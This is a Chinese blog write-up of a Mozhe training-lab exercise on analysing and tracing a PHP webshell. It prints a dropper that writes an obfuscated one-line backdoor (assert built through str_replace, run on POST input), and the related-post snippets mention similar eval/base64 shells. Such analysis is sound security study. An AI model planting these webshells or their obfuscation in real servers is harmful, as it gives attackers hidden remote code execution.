墨者 - WebShell代码分析溯源(第11题)

最新推荐文章于 2022-10-14 11:16:23 发布
最新推荐文章于 2022-10-14 11:16:23 发布
阅读量438 收藏 1
点赞数
分类专栏: 墨者刷题笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_39936434/article/details/96004165
版权

下载文件,如下代码

<?php 
if(!empty($_GET[1]) && $_GET[1]=='GET.fPZ87'){
$_=@fopen('t.php', 'a');
@fwrite($_,"<?php \$_=str_replace('ilo','ass',str_replace('vey','ert',\$_GET[2]));
@\$_(\$_POST[1]);?>");
@fclose($_);}
?>

这是一句话木马的变种

解释一下:判断url的参数1的值是否为GET.fPZ87,是才进入if判断并且创建t.php文件,并且写入以下代码

@fwrite($_,"<?php \$_=str_replace('ilo','ass',str_replace('vey','ert',\$_GET[2]));
@\$_(\$_POST[1]);?>");

这里还需要请求一次url,而且用函数str_replace将ilo 替换成 ass,vey换成ert

最后构成一句话木马

assert($_POST[1])

分析完了直接进入主题

hackbar访问以下url

查询key文件

 

吃肉唐僧
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
WebShell文件上传漏洞分析溯源
02-22
WebShell 文件上传漏洞分析溯源 一、WebShell 文件上传漏洞概述 WebShell 文件上传漏洞是指攻击者通过上传恶意文件(如WebShell)来获取服务器的控制权,从而实现对服务器的攻击和控制。这种漏洞通常存在于Web应用...
墨者学院 - WebShell代码分析溯源(第11)
多崎巡礼的博客
08-06 715
&lt;?php  if(!empty($_GET[1]) &amp;&amp; $_GET[1]=='GET.fPZ87'){                     //若get到的1不为空且1=GET.fPZ87的话执行下面操作     $_=@fopen('t.php', 'a');                                                      ...
墨者学院-WebShell代码分析溯源(第11)
JimWu的博客
09-04 242
WebShell代码分析溯源(第11) 难易程度:★★★ 目类型:代码审计 使用工具:FireFox浏览器、菜刀 1.打开靶场,下载备份文件。 2.解压文件,分析代码。 3.从代码中,知道当1=GET.fpz287时会生成t.php,所以我们要在url中输入。 我们继续分析一下代码,能看出代码中运用了str_replace函数。 该函数会把以其他字符替换字符串中的一些字符,在代码中就是把i...
WebShell文件上传漏洞分析溯源(墨者学院)
全村的希望
10-14 934
WebShell文件上传漏洞分析溯源
墨者学院 - WebShell代码分析溯源(第5)
多崎巡礼的博客
08-02 821
  一个个看,,,找到该文件,经典的回调函数形式 菜刀连接, ip/www/Exception.php?POST=assert 密码为assert 得到key 关于回调函数可参考此文章 https://blog.csdn.net/qq_24196029/article/details/78118680     &lt;?php error_reporting(0); call...
墨者学院-HTML前端代码分析(暗链)、HTTP动作练习、IP地址伪造(第2)
最新发布
05-29
HTML前端代码分析(暗链)、HTTP动作练习、IP地址伪造(第2)、phpMyAdmin后台文件包含分析溯源、PHP代码分析溯源(第1)、PHP代码分析溯源(第2)、PHP逻辑漏洞利用实战(第1)、SQL手工注入漏洞测试(Access数据库)
APP原型实例:墨者科技-旅行小蜜APP2.0.rp
12-17
产品经理
0080 APP原型实例:墨者科技-旅行小蜜APP2.0.rp
01-06
rp原型源文件
第30天:WEB漏洞-RCE代码及命令执行漏洞全解1
08-03
3. **检测**:通过静态代码分析、动态运行时检测和漏洞扫描工具,可以发现潜在的代码执行风险。 4. **危害**:攻击者可以通过RCE漏洞执行任意命令,获取敏感信息,篡改数据,甚至完全控制服务器。 5. **修复**:最佳...
墨者 - IP地址伪造(第1)
吃肉唐僧的博客
07-18 407
正常登录,会提示需要本地服务器才可以登录 推断做了ip地址校验 用bp抓包 X-Forwarded-For: 127.0.0.1 伪装代理ip地址 密码猜测为admin,admin 成功
php为什么不能用empty($_POST)来判断是否有传值
热门推荐
空白_回忆的博客
07-15 1万+
php为什么不能用empty($_POST)来判断是否有传值$_POST是个数组,而且里边有键名和键值,虽然键值是空的,但empty判断还是有值,所以不能用!empty($_POST)来判断在thinkphp中可以: 1、用模型的自动验证功能进行判断 2、用单个字段来判断,如:if( I("post.goods_name") == ""){............}在普通PHP文件中只能用!empt
墨者学院-远程电子数据取证-木马分析(第1)
qq_37850901的博客
09-26 515
墨者学院-远程电子数据取证-木马分析(第1) 根据给的账号密码登入系统 通过搜索引擎中的链接,发现上传的目录为“WEB站点根目录/seo/ 所以我们搜索seo,看看有什么发现只能找到快捷方式,猜测隐藏了 C:Inetpubwwwroot下没有seo这个文件夹,显示所有文件,发现还是没有,百度搜了下,说是驱动级文件隐藏,特征为系统目录下存在如下文件: C:WINDOWSxlkfs.dat C:WI...
那些强悍的PHP一句话后门
大方子
08-06 9450
以一个学习的心态来对待PHP后门程序,很多PHP后门代码让我们看到程序员们是多么的用心良苦。 强悍的PHP一句话后门 这类后门让网站、服务器管理员很是头疼,经常要换着方法进行各种检测,而很多新出现的编写技术,用普通的检测方法是没法发现并处理的。今天我们细数一些有意思的PHP一句话木马。 利用404页面隐藏PHP小马   PHP   1 2 3 4 ...
怎么利用js判断用户名和密码是否为空,如不空则跳到指定网页.下面是其中一段代码
qq_42058441的博客
11-21 3747
&lt;/style&gt; &lt;?php if(isset($_POST['Submit']) &amp;&amp; $_POST['Submit']=="登录"){ //通过isset()函数对登录按钮进行判断 $user=$_POST['Text1']; //通过$_POST函数调用表单文本域的值 $pass=$_POST['Password1']; if(empty($user)...
墨者学院 - PHP代码分析溯源(第4)
多崎巡礼的博客
08-05 1093
打开发现提示key在根目录,且给出代码 &lt;?php eval(gzinflate(base64_decode(&amp;40pNzshXSFCJD3INDHUNDolOjE2wtlawt+MCAA==&amp;))); ?&gt;  这是base64加密+压缩的编码 简单方法就是直接把eval改成echo输出 执行&lt;?php echo(gzinflate(base64_decode(‘...
墨者 - 网络数据分析溯源(连接login.php的IP)
吃肉唐僧的博客
07-23 399
直接搜索包数据内容含有“/admin_d98gD2@k/login.php”的就行了 请求地址为45.179.70.154
sycsec的一道审计
一个码农的笔记
10-31 3099
首先目给出了源代码 <?php if(isset($_GET) && !empty($_GET)){ $url = $_GET['file']; $path = "upload/".$_GET['path']; }else{ show_source(__FILE__); exit(); } if(strpos($path,'..') > -1){
墨者-sql手工注入漏洞测试
04-29
墨者安全团队是一支专注于网络安全领域的团队,他们致力于网络安全研究和技术推广。其中,手工注入漏洞测试是他们的一项重要工作之一。 在进行手工注入漏洞测试时,墨者安全团队通常会通过一系列的步骤来进行测试。首先,他们会对目标网站进行初步信息收集,包括了解目标网站的架构、数据库类型、应用程序等等。然后,他们会通过手工注入的方式对目标网站进行攻击,以确定是否存在注入漏洞,并尝试获取敏感信息。 在手工注入的过程中,墨者安全团队通常会使用一些工具来辅助测试,例如Burp Suite、SQLMap等。同时,他们也会根据目标网站的具体情况进行一些自定义的测试,以提高测试效果。 总的来说,墨者安全团队的手工注入漏洞测试方法比较系统和全面,可以有效地发现目标网站中存在的注入漏洞,从而帮助企业提高网络安全防护水平。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值